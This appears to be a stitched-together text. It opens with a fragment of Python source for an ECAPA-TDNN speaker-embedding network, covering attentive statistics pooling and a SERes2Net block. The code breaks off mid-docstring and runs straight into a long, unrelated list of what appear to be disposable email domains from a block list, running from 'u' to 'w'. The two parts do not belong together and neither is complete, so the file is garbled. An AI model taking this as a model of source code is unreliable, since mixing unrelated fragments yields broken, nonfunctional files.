Conv1d( in_channels=attention_channels, out_channels=channels, kernel_size=1 ) def forward(self, x, lengths=None): """Calculates mean and std for a batch (input tensor). Arguments --------- x : torch.Tensor Tensor of shape [N, C, L]. """ L = x.shape[-1] def _compute_statistics(x, m, dim=2, eps=self.eps): mean = (m * x).sum(dim) std = torch.sqrt( (m * (x - mean.unsqueeze(dim)).pow(2)).sum(dim).clamp(eps) ) return mean, std if lengths is None: lengths = torch.ones(x.shape[0], device=x.device) # Make binary mask of shape [N, 1, L] mask = length_to_mask(lengths * L, max_len=L, device=x.device) mask = mask.unsqueeze(1) # Expand the temporal context of the pooling layer by allowing the # self-attention to look at global properties of the utterance. if self.global_context: # torch.std is unstable for backward computation # https://github.com/pytorch/pytorch/issues/4320 total = mask.sum(dim=2, keepdim=True).float() mean, std = _compute_statistics(x, mask / total) mean = mean.unsqueeze(2).repeat(1, 1, L) std = std.unsqueeze(2).repeat(1, 1, L) attn = torch.cat([x, mean, std], dim=1) else: attn = x # Apply layers attn = self.conv(self.tanh(self.tdnn(attn))) # Filter out zero-paddings attn = attn.masked_fill(mask == 0, float("-inf")) attn = F.softmax(attn, dim=2) mean, std = _compute_statistics(x, attn) # Append mean and std of the batch pooled_stats = torch.cat((mean, std), dim=1) pooled_stats = pooled_stats.unsqueeze(2) return pooled_stats class SERes2NetBlock(nn.Module): """An implementation of building block in ECAPA-TDNN, i.e., TDNN-Res2Net-TDNN-SEBlock. Arguments ---------- out_channels: int The number of output channels. res2net_scale: int The scale of the Res2Net block. kernel_size: int The kernel size of the TDNN blocks. dilation: int The dilation of the Res2Net block. activation : torch class A class for constructing the activation layers. Example ------- >>> x = torch.rand(8, 120, 64).transpose(1, 2) >>> conv = SERes2NetBlock(64, 64, res2net_scale=4) >>> out = conv(x).transpose(1, 2) >>> out.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, res2net_scale=8, se_channels=128, kernel_size=1, dilation=1, activation=torch.nn.ReLU, ): super().__init__() self.out_channels = out_channels self.tdnn1 = TDNNBlock( in_channels, out_channels, kernel_size=1, dilation=1, activation=activation, ) self.res2net_block = Res2NetBlock( out_channels, out_channels, res2net_scale, kernel_size, dilation ) self.tdnn2 = TDNNBlock( out_channels, out_channels, kernel_size=1, dilation=1, activation=activation, ) self.se_block = SEBlock(out_channels, se_channels, out_channels) self.shortcut = None if in_channels != out_channels: self.shortcut = Conv1d( in_channels=in_channels, out_channels=out_channels, kernel_size=1, ) def forward(self, x, lengths=None): residual = x if self.shortcut: residual = self.shortcut(x) x = self.tdnn1(x) x = self.res2net_block(x) x = self.tdnn2(x) x = self.se_block(x, lengths) return x + residual class ECAPA_TDNN(torch.nn.Module): """An implementation of the speaker embedding model in a paper. "ECAPA-TDNN: Emphasized Channel Attention, Propagation and Aggregation in TDNN Based Speaker Verification" (https://arxiv.org/abs/2005.07143). Arguments --------- device : str Device used, e.g., "cpu" or "cuda". activation : torch class A class for constructing the activation layers. channels : list of ints Output channels for TDNN/SERes2Net layer. kernel_sizes : list of ints List of kernel sizes for each layer. dilations : list of ints List of dilations for kernels in each layer. lin_neurons
"umy.kr", "uncond.us", "undeva.net", "unicorntoday.com", "unicredit.tk", "unif8nthemsmnp.cf", "unif8nthemsmnp.ga", "unif8nthemsmnp.gq", "unif8nthemsmnp.ml", "unif8nthemsmnp.tk", "unite.cloudns.asia", "unixproject.ru", "unmail.ru", "unpastore.co", "unseen.eu", "uny.kr", "uo8fylspuwh9c.cf", "uo8fylspuwh9c.ga", "uo8fylspuwh9c.gq", "uo8fylspuwh9c.ml", "uo8fylspuwh9c.tk", "uojjhyhih.cf", "uojjhyhih.ga", "uojjhyhih.gq", "uojjhyhih.ml", "upak-vakuum.ru", "upakologiya.ru", "upbrellastore.ru", "updates9z.com", "upetreal.ru", "upf7qtcvyeev.cf", "upf7qtcvyeev.ga", "upf7qtcvyeev.gq", "upf7qtcvyeev.tk", "upgcsjy.com", "uphomail.ga", "uplay-store.ru", "upliftnow.com", "uplipht.com", "upozowac.info", "uprsoft.ru", "upskirtscr.com", "uptodate.tech", "upy.kr", "uqcgga04i1gfbqf.cf", "uqcgga04i1gfbqf.ga", "uqcgga04i1gfbqf.gq", "uqcgga04i1gfbqf.ml", "uqcgga04i1gfbqf.tk", "uqghq6tvq1p8c56.cf", "uqghq6tvq1p8c56.ga", "uqghq6tvq1p8c56.gq", "uqghq6tvq1p8c56.ml", "uqghq6tvq1p8c56.tk", "uqxcmcjdvvvx32.cf", "uqxcmcjdvvvx32.ga", "uqxcmcjdvvvx32.gq", "uqxcmcjdvvvx32.ml", "uqxcmcjdvvvx32.tk", "uralmaxx.ru", "uralplay.ru", "uralsk-airport.ru", "urbanstudios.online", "urchatz.ga", "uredemail.com", "ureee.us", "urfey.com", "urfunktion.se", "urhen.com", "urlina.ru", "urltc.com", "uroid.com", "uroki-logopeda.ru", "urotrin-supershop.ru", "urotrin62.ru", "urotrinium.ru", "urotrinz-supershop.ru", "uruarurqup5ri9s28ki.cf", "uruarurqup5ri9s28ki.ga", "uruarurqup5ri9s28ki.gq", "uruarurqup5ri9s28ki.ml", "uruarurqup5ri9s28ki.tk", "us.dlink.cf", "us.dlink.gq", "us.to", "usa-gov.cf", "usa-gov.ga", "usa-gov.gq", "usa-gov.ml", "usa-gov.tk", "usa.cc", "usa.isgre.at", "usa623.gq", "usachan.cf", "usachan.gq", "usachan.ml", "usactive.ru", "usaf.dmtc.press", "usako.be", "usako.net", "uscaves.com", "used-product.fr", "usemail.xyz", "usenetmail.tk", "users.idbloc.co", "userseo.ga", "usharingk.com", "ushijima1129.cf", "ushijima1129.ga", "ushijima1129.gq", "ushijima1129.ml", "ushijima1129.tk", "usiaj.com", "usitv.ga", "usn-dlya-ipe.ru", "ussv.club", "ustins.ru", "usurpator.ru", "ut6rtiy1ajr.ga", "ut6rtiy1ajr.gq", "ut6rtiy1ajr.ml", "ut6rtiy1ajr.tk", "utangsss.online", "utc7xrlttynuhc.cf", "utc7xrlttynuhc.ga", "utc7xrlttynuhc.gq", "utc7xrlttynuhc.ml", "utc7xrlttynuhc.tk", "utilities-online.info", "utilitservis.ru", "utoo.email", "utooemail.com", "uttoymdkyokix6b3.cf", "uttoymdkyokix6b3.ga", "uttoymdkyokix6b3.gq", "uttoymdkyokix6b3.ml", "uttoymdkyokix6b3.tk", "uttvgar633r.cf", "uttvgar633r.ga", "uttvgar633r.gq", "uttvgar633r.ml", "uttvgar633r.tk", "utwevq886bwc.cf", "utwevq886bwc.ga", "utwevq886bwc.gq", "utwevq886bwc.ml", "utwevq886bwc.tk", "uu.gl", "uu2.ovh", "uurksjb7guo0.cf", "uurksjb7guo0.ga", "uurksjb7guo0.gq", "uurksjb7guo0.ml", "uurksjb7guo0.tk", "uuroalaldoadkgk058.cf", "uvelichenie-grudi-kak.ru", "uvelichit-grud.ru", "uvidetsmotret.ru", "uvy.kr", "uvyuviyopi.cf", "uvyuviyopi.ga", "uvyuviyopi.gq", "uvyuviyopi.ml", "uvyuviyopi.tk", "uw5t6ds54.com", "uwillsuc.pw", "uwork4.us", "ux.dob.jp", "ux.uk.to", "uxs14gvxcmzu.cf", "uxs14gvxcmzu.ga", "uxs14gvxcmzu.gq", "uxs14gvxcmzu.ml", "uxs14gvxcmzu.tk", "uydagdmzsc.cf", "uydagdmzsc.ga", "uydagdmzsc.gq", "uydagdmzsc.ml", "uydagdmzsc.tk", "uyp5qbqidg.cf", "uyp5qbqidg.ga", "uyp5qbqidg.gq", "uyp5qbqidg.ml", "uyp5qbqidg.tk", "uyu.kr", "uyx3rqgaghtlqe.cf", "uyx3rqgaghtlqe.ga", "uyx3rqgaghtlqe.gq", "uyx3rqgaghtlqe.ml", "uyx3rqgaghtlqe.tk", "uz6tgwk.com", "uzgrthjrfr4hdyy.gq", "uzrip.com", "uzxia.cf", "uzxia.com", "uzxia.ga", "uzxia.gq", "uzxia.ml", "uzxia.tk", "v-mail.xyz", "v.0v.ro", "v.jsonp.ro", "v.olvos90.tk", "v00qy9qx4hfmbbqf.cf", "v00qy9qx4hfmbbqf.ga", "v00qy9qx4hfmbbqf.gq", "v00qy9qx4hfmbbqf.ml", "v00qy9qx4hfmbbqf.tk", "v0domwwkbyzh1vkgz.cf", "v0domwwkbyzh1vkgz.ga", "v0domwwkbyzh1vkgz.gq", "v0domwwkbyzh1vkgz.ml", "v0domwwkbyzh1vkgz.tk", "v21.me.uk", "v27hb4zrfc.cf", "v27hb4zrfc.ga", "v27hb4zrfc.gq", "v27hb4zrfc.ml", "v27hb4zrfc.tk", "v3bsb9rs4blktoj.cf", "v3bsb9rs4blktoj.ga", "v3bsb9rs4blktoj.gq", "v3bsb9rs4blktoj.ml", "v3bsb9rs4blktoj.tk", "v4gdm4ipndpsk.cf", "v4gdm4ipndpsk.ga", "v4gdm4ipndpsk.gq", "v4gdm4ipndpsk.ml", "v4gdm4ipndpsk.tk", "v58tk1r6kp2ft01.cf", "v58tk1r6kp2ft01.ga", "v58tk1r6kp2ft01.gq", "v58tk1r6kp2ft01.ml", "v58tk1r6kp2ft01.tk", "v6iexwlhb6n2hf.ga", "v6iexwlhb6n2hf.gq", "v6iexwlhb6n2hf.ml", "v6iexwlhb6n2hf.tk", "v7ecub.com", "va5vsqerkpmsgibyk.cf", "va5vsqerkpmsgibyk.ga", "va5vsqerkpmsgibyk.gq", "va5vsqerkpmsgibyk.ml", "va5vsqerkpmsgibyk.tk", "vaasfc4.tk", "vacancydom.ru", "vacwdlenws604.ml", "vadlag.xyz", "vagsuerokgxim1inh.cf", "vagsuerokgxim1inh.ga", "vagsuerokgxim1inh.gq", "vagsuerokgxim1inh.ml", "vagsuerokgxim1inh.tk", "vaik.cf", "vaik.ga", "vaik.gq", "vaik.ml", "vaik.tk", "vajq8t6aiul.cf", "vajq8t6aiul.ga", "vajq8t6aiul.gq", "vajq8t6aiul.ml", "vajq8t6aiul.tk", "valemail.net", "valentinagrib.ru", "valhalladev.com", "valyutniy-kontrol.ru", "vampresent.ru", "vanbil.tk", "vanhoangtn1.ga", "vanhoangtn1.ooo", "vanhoangtn1.us", "vapecentral.ru", "vapetaxi.ru", "variouscraft.ru", "vash--mishka.ru", "vaultsophia.com", "vaultsophiaonline.com", "vay.kr", "vba.kr", "vbalakovo.ru", "vbha0moqoig.ga", "vbha0moqoig.ml", "vbha0moqoig.tk", "vcbmail.ga", "vcghv0eyf3fr.cf", "vcghv0eyf3fr.ga", "vcghv0eyf3fr.gq", "vcghv0eyf3fr.ml", "vcghv0eyf3fr.tk", "vcticngsh5.ml", "vdmmhozx5kxeh.cf", "vdmmhozx5kxeh.ga", "vdmmhozx5kxeh.gq", "vdmmhozx5kxeh.ml", "vdmmhozx5kxeh.tk", "vdobromzdravyy.ru", "vdomemilo.ru", "ve8zum01pfgqvm.cf", "ve8zum01pfgqvm.ga", "ve8zum01pfgqvm.gq", "ve8zum01pfgqvm.ml", "ve8zum01pfgqvm.tk", "ve9xvwsmhks8wxpqst.cf", "ve9xvwsmhks8wxpqst.ga", "ve9xvwsmhks8wxpqst.gq", "ve9xvwsmhks8wxpqst.ml", "ve9xvwsmhks8wxpqst.tk", "veanlo.com", "vedmail.com", "vedula.com", "veebee.cf", "veebee.ga", "veebee.gq", "veebee.ml", "veebee.tk", "vefspchlzs2qblgoodf.ga", "vefspchlzs2qblgoodf.ml", "vefspchlzs2qblgoodf.tk", "vehicle-blackbox-dvr.ru", "vektik.com", "veldmail.ga", "velosegway.ru", "velosiped-go.ru", "vemomail.win", "veneersofficial.ru", "veneersperfectsmile.ru", "venompen.com", "veo.kr", "ver0.cf", "ver0.ga", "ver0.gq", "ver0.ml", "ver0.tk", "verbee.ru", "vercelli.cf", "vercelli.ga", "vercelli.gq", "vercelli.ml", "verifymail.cf", "verifymail.ga", "verifymail.gq", "verifymail.ml", "verifymail.win", "verisign.cf", "verisign.ga", "verisign.gq", "verizondw.com", "vernipay.ru", "vernivychet.ru", "vernz.cf", "vernz.ga", "vernz.gq", "vernz.ml", "vernz.tk", "veronateam.ru", "verossa-rp.ru", "veryday.ch", "veryday.eu", "veryday.info", "veryprice.co", "veryrealemail.com", "vestimed.ru", "vestnikao.ru", "vestniktm.ru", "vettery.cf", "vettery.gq", "vettery.ml", "vettery.tk", "vezdehod-rent.ru", "vfemail.net", "vfienvtua2dlahfi7.cf", "vfienvtua2dlahfi7.ga", "vfienvtua2dlahfi7.gq", "vfienvtua2dlahfi7.ml", "vfienvtua2dlahfi7.tk", "vfj9g3vcnj7kadtty.cf", "vfj9g3vcnj7kadtty.ga", "vfj9g3vcnj7kadtty.gq", "vfj9g3vcnj7kadtty.ml", "vfj9g3vcnj7kadtty.tk", "vgamers.win", "vgdbankrotstvo.ru", "vgsreqqr564.cf", "vgsreqqr564.ga", "vgsreqqr564.gq", "vgsreqqr564.ml", "vgsreqqr564.tk", "vhan.tech", "vhglvi6o.com", "vhntp15yadrtz0.cf", "vhntp15yadrtz0.ga", "vhntp15yadrtz0.gq", "vhntp15yadrtz0.ml", "vhntp15yadrtz0.tk", "via.tokyo.jp", "vibi4f1pc2xjk.cf", "vibi4f1pc2xjk.ga", "vibi4f1pc2xjk.gq", "vibi4f1pc2xjk.ml", "vibi4f1pc2xjk.tk", "vickaentb.tk", "vidchart.com", "video-dlj-tebya.ru", "videocorporation.ru", "videohd-clip.ru", "videoprosmotr.ru", "videotubegames.ru", "viditag.com", "vidoc.ru", "vieebee.cf", "vieebee.ga", "vieebee.gq", "vieebee.tk", "vienna.cf", "viewcastmedia.com", "viewcastmedia.net", "viewcastmedia.org", "vikaslin-ruraten.ru", "vikikredit.ru", "vikingsonly.com", "viktorina-2018.ru", "viktorkedrovskiy.ru", "vikylov.ru", "villabhj.com", "vilnapresa.com", "vimi-kan.ru", "vincenza1818.site", "vinernet.com", "vinsmoke.tech", "vip-clicker.ru", "vip-lovemagic.ru", "vip-mail.ml", "vip.aiot.eu.org", "vip.cool", "vip.dmtc.press", "vip.hstu.eu.org", "vipepe.com", "viphone.eu.org", "viphop.ru", "viplinz.ru", "viplovemagic.ru", "vipmagi.ru", "vipshkatulki.ru", "viptupperware.ru", "viral-science.fun", "viralhits.org", "virgilio.ga", "virgilio.gq", "virgilio.ml", "virgiliomail.cf", "virgiliomail.ga", "virgiliomail.gq", "virgiliomail.ml", "virgiliomail.tk", "virginsrus.xyz", "virtual-email.com", "virtualmail.gq", "virtznakomstva.ru", "visa-securepay.cf", "visa-securepay.ga", "visa-securepay.gq", "visa-securepay.ml", "visa-securepay.tk", "visa159.ru", "visal007.tk", "visal168.cf", "visal168.ga", "visal168.gq", "visal168.ml", "visal168.tk", "visantia.ru", "visit24.ru", "visitingob.com", "vistore.co", "viwsala.com", "vixletdev.com", "vk-comm.ru", "vkcode.ru", "vkhotkevich.ru", "vkinomax.ru", "vkusnosam.ru", "vkusnyj-recept-foto.ru", "vkusup.ru", "vkvhod.ru", "vl-pla.ru", "vl2ivlyuzopeawoepx.cf", "vl2ivlyuzopeawoepx.ga", "vl2ivlyuzopeawoepx.gq", "vl2ivlyuzopeawoepx.ml", "vl2ivlyuzopeawoepx.tk", "vlipbttm9p37te.cf", "vlipbttm9p37te.ga", "vlipbttm9p37te.gq", "vlipbttm9p37te.ml", "vlipbttm9p37te.tk", "vlivki.ru", "vlsca8nrtwpcmp2fe.cf", "vlsca8nrtwpcmp2fe.ga", "vlsca8nrtwpcmp2fe.gq", "vlsca8nrtwpcmp2fe.ml", "vlsca8nrtwpcmp2fe.tk", "vlstwoclbfqip.cf", "vlstwoclbfqip.ga", "vlstwoclbfqip.gq", "vlstwoclbfqip.ml", "vlstwoclbfqip.tk", "vmail.tech", "vmani.com", "vmentorgk.com", "vmhdisfgxxqoejwhsu.cf", "vmhdisfgxxqoejwhsu.ga", "vmhdisfgxxqoejwhsu.gq", "vmhdisfgxxqoejwhsu.ml", "vmhdisfgxxqoejwhsu.tk", "vmlfwgjgdw2mqlpc.cf", "vmlfwgjgdw2mqlpc.ga", "vmlfwgjgdw2mqlpc.ml", "vmlfwgjgdw2mqlpc.tk", "vmpanda.com", "vn92wutocpclwugc.cf", "vn92wutocpclwugc.ga", "vn92wutocpclwugc.gq", "vn92wutocpclwugc.ml", "vn92wutocpclwugc.tk", "vnedorognik-yeti.ru", "vnedu.me", "vnshare.info", "vodgard.ru", "void.maride.cc", "volkswagen-ag.cf", "volkswagen-ag.ga", "volkswagen-ag.gq", "volkswagen-ag.ml", "volkswagen-ag.tk", "voltaer.com", "volvo-ab.cf", "volvo-ab.ga", "volvo-ab.gq", "volvo-ab.ml", "volvo-ab.tk", "volvo-s60.cf", "volvo-s60.ga", "volvo-s60.gq", "volvo-s60.ml", "volvo-s60.tk", "volvo-v40.ml", "volvo-v40.tk", "volvogroup.ga", "volvogroup.gq", "volvogroup.ml", "volvogroup.tk", "volvopenta.tk", "vomoto.com", "vonbe.tk", "vorga.org", "vospitanievovrema.ru", "votiputox.org", "vouk.cf", "vouk.gq", "vouk.ml", "vouk.tk", "vozmi-instrument.ru", "vp.ycare.de", "vpfbattle.com", "vphnfuu2sd85w.cf", "vphnfuu2sd85w.ga", "vphnfuu2sd85w.gq", "vphnfuu2sd85w.ml", "vphnfuu2sd85w.tk", "vpidcvzfhfgxou.cf", "vpidcvzfhfgxou.ga", "vpidcvzfhfgxou.gq", "vpidcvzfhfgxou.ml", "vpidcvzfhfgxou.tk", "vpn33.top", "vpomosmame.ru", "vprice.co", "vps30.com", "vps911.net", "vpscloudvntoday.com", "vpslists.com", "vpsmobilecloudkb.com", "vpsorg.pro", "vpsorg.top", "vpstraffic.com", "vr4x4.ru", "vr5gpowerv.com", "vradportal.com", "vremonte24-store.ru", "vrgwkwab2kj5.cf", "vrgwkwab2kj5.ga", "vrgwkwab2kj5.gq", "vrgwkwab2kj5.ml", "vrgwkwab2kj5.tk", "vrloco.com", "vrou.cf", "vrou.ga", "vrou.gq", "vrou.ml", "vrou.tk", "vrpitch.com", "vs3ir4zvtgm.cf", "vs3ir4zvtgm.ga", "vs3ir4zvtgm.gq", "vs3ir4zvtgm.ml", "vs3ir4zvtgm.tk", "vs904a6.com", "vse-dveriru.ru", "vse-oboiru.ru", "vse-polyru.ru", "vse-smi.ru", "vse-zamkiru.ru", "vsedirect.ru", "vsedveriru.ru", "vsegirect.ru", "vsemsoft.ru", "vseoboiru.ru", "vseoneyrosisteme7.ru", "vsepolyru.ru", "vsevnovosti.ru", "vsezamkiru.ru", "vssms.com", "vstartup4q.com", "vt0uhhsb0kh.cf", "vt0uhhsb0kh.ga", "vt0uhhsb0kh.gq", "vt0uhhsb0kh.ml", "vt0uhhsb0kh.tk", "vt8khiiu9xneq.cf", "vt8khiiu9xneq.ga", "vt8khiiu9xneq.gq", "vt8khiiu9xneq.ml", "vt8khiiu9xneq.tk", "vt8zilugrvejbs.tk", "vteachesb.com", "vteensp.com", "vtxmail.us", "vu981s5cexvp.cf", "vu981s5cexvp.ga", "vu981s5cexvp.gq", "vu981s5cexvp.ml", "vubby.com", "vuiy.pw", "vutdrenaf56aq9zj68.cf", "vutdrenaf56aq9zj68.ga", "vutdrenaf56aq9zj68.gq", "vutdrenaf56aq9zj68.ml", "vutdrenaf56aq9zj68.tk", "vuv9hhstrxnjkr.cf", "vuv9hhstrxnjkr.ga", "vuv9hhstrxnjkr.gq", "vuv9hhstrxnjkr.ml", "vuv9hhstrxnjkr.tk", "vuzimir.cf", "vvb3sh5ie0kgujv3u7n.cf", "vvb3sh5ie0kgujv3u7n.ga", "vvb3sh5ie0kgujv3u7n.gq", "vvb3sh5ie0kgujv3u7n.ml", "vvb3sh5ie0kgujv3u7n.tk", "vvlvmrutenfi1udh.ga", "vvlvmrutenfi1udh.ml", "vvlvmrutenfi1udh.tk", "vvng8xzmv2.cf", "vvng8xzmv2.ga", "vvng8xzmv2.gq", "vvng8xzmv2.ml", "vvng8xzmv2.tk", "vvv.sytes.net", "vvx046q.com", "vw-ag.tk", "vw-audi.ml", "vw-cc.cf", "vw-cc.ga", "vw-cc.gq", "vw-cc.ml", "vw-cc.tk", "vw-eos.cf", "vw-eos.ga", "vw-eos.gq", "vw-eos.ml", "vw-eos.tk", "vw-seat.ml", "vw-skoda.ml", "vwtedx7d7f.cf", "vwtedx7d7f.ga", "vwtedx7d7f.gq", "vwtedx7d7f.ml", "vwtedx7d7f.tk", "vxqt4uv19oiwo7p.cf", "vxqt4uv19oiwo7p.ga", "vxqt4uv19oiwo7p.gq", "vxqt4uv19oiwo7p.ml", "vxqt4uv19oiwo7p.tk", "vyhade3z.gq", "vykupavto1.ru", "vyrski4nwr5.cf", "vyrski4nwr5.ga", "vyrski4nwr5.gq", "vyrski4nwr5.ml", "vyrski4nwr5.tk", "vzlom4ik.tk", "vzyat-ssudy.ru", "w-amst.ru", "w-asertun.ru", "w.0w.ro", "w22fe21.com", "w3mailbox.com", "w3windsor.com", "w4i3em6r.com", "w4ms.ga", "w4ms.ml", "w5gpurn002.cf", "w5gpurn002.ga", "w5gpurn002.gq", "w5gpurn002.ml", "w5gpurn002.tk", "w634634.ga", "w656n4564.cf", "w656n4564.ga", "w656n4564.gq", "w656n4564.ml", "w656n4564.tk", "w70ptee1vxi40folt.cf", "w70ptee1vxi40folt.ga", "w70ptee1vxi40folt.gq", "w70ptee1vxi40folt.ml", "w70ptee1vxi40folt.tk", "w7wdhuw9acdwy.cf", "w7wdhuw9acdwy.ga", "w7wdhuw9acdwy.gq", "w7wdhuw9acdwy.ml", "w7wdhuw9acdwy.tk", "w918bsq.com", "w9y9640c.com", "wa010.com", "wadawdawd.ru", "wagfused.com", "wailo.cloudns.asia", "waitingjwo.com", "wajikethanh96ger.gq", "wakingupesther.com", "walala.org", "waldemar.ru", "walkmail.net", "walkmail.ru", "wanko.be", "want2lov.us", "wantplay.site", "wapl.ga", "wapyello.gq", "warau-kadoni.com", "warnednl2.com", "warungku.me", "wasabi-75.ru", "wasd.dropmail.me", "waskitacorp.cf", "waskitacorp.ga", "waskitacorp.gq", "waskitacorp.ml", "waskitacorp.tk", "wasse-asxzer.ru", "watashiyuo.cf", "watashiyuo.ga", "watashiyuo.gq", "watashiyuo.ml", "watashiyuo.tk", "watchofficial.ru", "wavesplatfom.ru", "wavesplotform.ru", "wazabi.club", "wca.cn.com", "wcddvezl974tnfpa7.cf", "wcddvezl974tnfpa7.ga", "wcddvezl974tnfpa7.gq", "wcddvezl974tnfpa7.ml", "wcddvezl974tnfpa7.tk", "wchatz.ga", "wd0payo12t8o1dqp.cf", "wd0payo12t8o1dqp.ga", "wd0payo12t8o1dqp.gq", "wd0payo12t8o1dqp.ml", "wd0payo12t8o1dqp.tk", "wdsfbghfg77hj.gq", "we.lovebitco.in", "we.qq.my", "wealthymoney.pw", "weammo.xyz", "weave.email", "web-contact.info", "web-email.eu", "web-emailbox.eu", "web-experts.net", "web-ideal.fr", "web-mail.pp.ua", "web-novosti.ru", "web.discard-email.cf", "web2mailco.com", "webaward.online", "webcontact-france.eu", "webcool.club", "webcoworking.ru", "webemail.me", "webgmail.info", "webhostingdomain.ga", "webide.ga", "webkiff.info", "weblenders.ru", "webm4il.info", "webmail.defaultdomain.ml", "webmail.kolmpuu.net", "webmail24.top", "webmails.top", "webmeetme.com", "webpozdravka.ru", "webpro24.ru", "webtempmail.online", "webtrip.ch", "webuser.in", "webxphp.ru", "wedooos.cf", "wedooos.ga", "wedooos.gq", "wedooos.ml", "wee.my", "weekendemail.com", "wefjo.grn.cc", "weg-beschlussbuch.de", "weg-werf-email.de", "wegwerf-email-addressen.de", "wegwerf-emails.de", "wegwerfadresse.de", "wegwerfemail.de", "wegwerfemail.info", "wegwerfmail.de", "wegwerfmail.info", "wegwerfmail.net", "wegwerfmail.org", "wegwerpmailadres.nl", "weldir.cf", "wellhungup.dynu.net", "wellys37.ru", "wemel.site", "wemel.top", "weprof.it", "wer34276869j.ga", "wer34276869j.gq", "wer34276869j.ml", "wer34276869j.tk", "wertxdn253eg.cf", "wertxdn253eg.ga", "wertxdn253eg.gq", "wertxdn253eg.ml", "wertxdn253eg.tk", "werw436526.cf", "werw436526.ga", "werw436526.gq", "werw436526.ml", "werw436526.tk", "wesandrianto241.ml", "wesatikah407.cf", "wesatikah407.ml", "wesazalia927.ga", "wesd.icu", "weselvina200.tk", "weseni427.tk", "wesfajria37.tk", "wesfajriah489.ml", "wesgaluh852.ga", "weshasni356.ml", "weshutahaean910.ga", "wesjuliyanto744.ga", "weskusumawardhani993.ga", "wesmubasyiroh167.ml", "wesmuharia897.ga", "wesnadya714.tk", "wesnurullah701.tk", "wesruslian738.cf", "wessastra497.tk", "wesw881.ml", "weswibowo593.cf", "weswidihastuti191.ml", "wesyuliyansih469.tk", "weszwestyningrum767.cf", "wetacompany.ru", "wetrainbayarea.com", "wetrainbayarea.org", "wfgdfhj.tk", "wfgoldpin.ru", "wfought0o.com", "wfrijgt4ke.cf", "wfrijgt4ke.ga", "wfrijgt4ke.gq", "wfrijgt4ke.ml", "wfrijgt4ke.tk", "wfxegkfrmfvyvzcwjb.cf", "wfxegkfrmfvyvzcwjb.ga", "wfxegkfrmfvyvzcwjb.gq", "wfxegkfrmfvyvzcwjb.ml", "wfxegkfrmfvyvzcwjb.tk", "wg0.com", "wgetcu0qg9kxmr9yi.ga", "wgetcu0qg9kxmr9yi.ml", "wgetcu0qg9kxmr9yi.tk", "wh4f.org", "whaaso.tk", "whatiaas.com", "whatifanalytics.com", "whatpaas.com", "whatsaas.com", "wheelemail.com", "wheels-club.ru", "whisperfocus.com", "whispersum.com", "whitemail.ga", "whiteseoromania.tk", "whj1wwre4ctaj.ml", "whj1wwre4ctaj.tk", "wholecustomdesign.com", "wholesaleelec.tk", "whoox.com", "whopy.com", "whstores.com", "whyspam.me", "wibblesmith.com", "wibu.online", "wicked-game.cf", "wicked-game.ga", "wicked-game.gq", "wicked-game.ml", "wicked-game.tk", "wicked.cricket", "wickmail.net", "widaryanto.info", "widget.gg", "wierie.tk", "wiki.8191.at", "wiki24.ga", "wiki24.ml", "wikidocuslava.ru", "wikilibhub.ru", "wikipedia-inc.cf", "wikipedia-inc.ga", "wikipedia-inc.gq", "wikipedia-inc.ml", "wikipedia-inc.tk", "wikipedia-llc.cf", "wikipedia-llc.ga", "wikipedia-llc.gq", "wikipedia-llc.ml", "wikipedia-llc.tk", "wikisite.co", "wil.kr", "wild-game.ru", "wildbeard.ru", "wilemail.com", "williamcastillo.me", "willloc.com", "willselfdestruct.com", "wimsg.com", "winemaven.info", "winfreegifts.xyz", "winnweb.win", "wirasempana.com", "wirawan.cf", "wirawanakhmadi.cf", "wisfkzmitgxim.cf", "wisfkzmitgxim.ga", "wisfkzmitgxim.gq", "wisfkzmitgxim.ml", "wisfkzmitgxim.tk", "witchermedallion.ru", "with-u.us", "wix.creou.dev", "wix.ptcu.dev", "wiz2.site", "wj7qzenox9.cf", "wj7qzenox9.ga", "wj7qzenox9.gq", "wj7qzenox9.ml", "wj7qzenox9.tk", "wjhndxn.xyz", "wkhaiii.cf", "wkhaiii.ga", "wkhaiii.gq", "wkhaiii.ml", "wkhaiii.tk", "wkschemesx.com", "wla9c4em.com", "wmail.cf", "wmail.club", "wmail.tk", "wmbadszand2varyb7.cf", "wmbadszand2varyb7.ga", "wmbadszand2varyb7.gq", "wmbadszand2varyb7.ml", "wmbadszand2varyb7.tk", "wmlorgana.com", "wmrmail.com", "wmwha0sgkg4.ga", "wmwha0sgkg4.ml", "wmwha0sgkg4.tk", "wmzgjewtfudm.cf", "wmzgjewtfudm.ga", "wmzgjewtfudm.gq", "wmzgjewtfudm.ml", "wmzgjewtfudm.tk", "wn3wq9irtag62.cf", "wn3wq9irtag62.ga", "wn3wq9irtag62.gq", "wn3wq9irtag62.ml", "wn3wq9irtag62.tk", "wn8c38i.com", "wo295ttsarx6uqbo.cf", "wo295ttsarx6uqbo.ga", "wo295ttsarx6uqbo.gq", "wo295ttsarx6uqbo.ml", "wo295ttsarx6uqbo.tk", "wofsrm6ty26tt.cf", "wofsrm6ty26tt.ga", "wofsrm6ty26tt.gq", "wofsrm6ty26tt.ml", "wofsrm6ty26tt.tk", "wokcy.com", "wollan.info", "wolukieh89gkj.tk", "wolukiyeh88jik.ga", "woman2019.ru", "womenbox.ru", "womenhealthcare.ooo", "wonderfulgifts.ru", "wongndeso.gq", "wonlexofficial.ru", "woodmachinery-group.ru", "woodoostudio.ru", "wopc.cf", "wopizza.ru", "wordme.stream", "work4uber.us", "workdinser.ru", "workfast24.ru", "workflowy.club", "workflowy.cn", "workflowy.top", "workflowy.work", "worklists.ru", "worksmail.cf", "worksmail.ga", "worksmail.gq", "worksmail.ml", "worksmail.tk", "world-champion.ru", "world-travel.online", "worlddonation.org", "worldnewstoday.ru", "worldpetcare.cf", "worldsonlineradios.com", "worldspace.link", "wot-booster.ru", "wow.royalbrandco.tk", "wowgrill.ru", "wowhair.ru", "wowmail.gq", "woxvf3xsid13.cf", "woxvf3xsid13.ga", "woxvf3xsid13.gq", "woxvf3xsid13.ml", "woxvf3xsid13.tk", "wp2romantic.com", "wpbinaq3w7zj5b0.cf", "wpbinaq3w7zj5b0.ga", "wpbinaq3w7zj5b0.ml", "wpbinaq3w7zj5b0.tk", "wpdfs.com", "wpeopwfp099.tk", "wpmail.org", "wpower.info", "wqxhasgkbx88.cf", "wqxhasgkbx88.ga", "wqxhasgkbx88.gq", "wqxhasgkbx88.ml", "wqxhasgkbx88.tk", "wr.moeri.org", "wr9v6at7.com", "wrapplese.ru", "writersefx.com", "wrlnewstops.space", "wronghead.com", "wrysutgst57.ga", "wsb-delta.ru", "wsbclusterdelta.ru", "wsbdelta.ru", "wscu73sazlccqsir.cf", "wscu73sazlccqsir.ga", 